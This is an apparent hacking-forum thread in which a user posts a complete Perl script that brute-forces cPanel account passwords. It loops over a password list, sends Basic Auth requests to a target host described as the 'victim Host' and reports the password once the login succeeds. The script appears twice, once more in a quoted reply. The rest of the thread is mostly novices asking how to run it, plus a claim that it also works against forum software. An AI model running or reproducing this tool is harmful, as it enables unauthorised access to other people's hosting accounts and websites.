Cpanel Password Brute Force Tool EXPLOIT

[RoB07]

Pearl =)

[PHP]#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# https://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "https://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}[/PHP]

[Alen]

Pearl =)

[PHP]#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# https://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "https://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}[/PHP]

For what is this? vBulletin?

[RoB07]

Any Domain with cPanel

[frono15]

Wow,Thx for this

[Dec0r87930]

This can be applied on, vBulletin, ipb boards, phpbb... and simple machine.

[XxUbErHaCkSxX]

rawr! idk how to use this please teach me someone!

[farbod]

i would tell u teach but its goin to take a while PM me

[Ferlas Soram]

Would you be able to kindly explain to me how to use this?

If not, thats OK too. I can always try to dissect it myself.

[[MPGH]arunforce]

It's PERL, it's self explanatory.

Oh and how can it be a bruteforcer and exploit. -_-

[Ferlas Soram]

PERL is a programming language, right?

Where could I download it?
Sorry, I'm a huge n00b.

[Mr.Dark Shark!!]

hey ya ,,,

sorry 1st about my bad language .. then - this is my 1st replay here and i hoppe that it gonna ok ..


from here u can download it,,
https://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



take care


i WaS H3r3
\
/
\
/
Mr.Dark Shark!!

[daveannan]

how do i use it in cmd cd C:\perl\bin

[Xeg]

Could anyone explain how this works?

Already tried but can't make it work <.<

[Hacksomegamers]

yeh the url isn't found.

hey ya ,,,

sorry 1st about my bad language .. then - this is my 1st replay here and i hoppe that it gonna ok ..


from here u can download it,,
https://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



take care


i WaS H3r3

/

/
Mr.Dark Shark!!

[BuLu]

Hi,
anyone any idea how to downloadt it ?n how to use it?Im a Newbie
Here.Thanks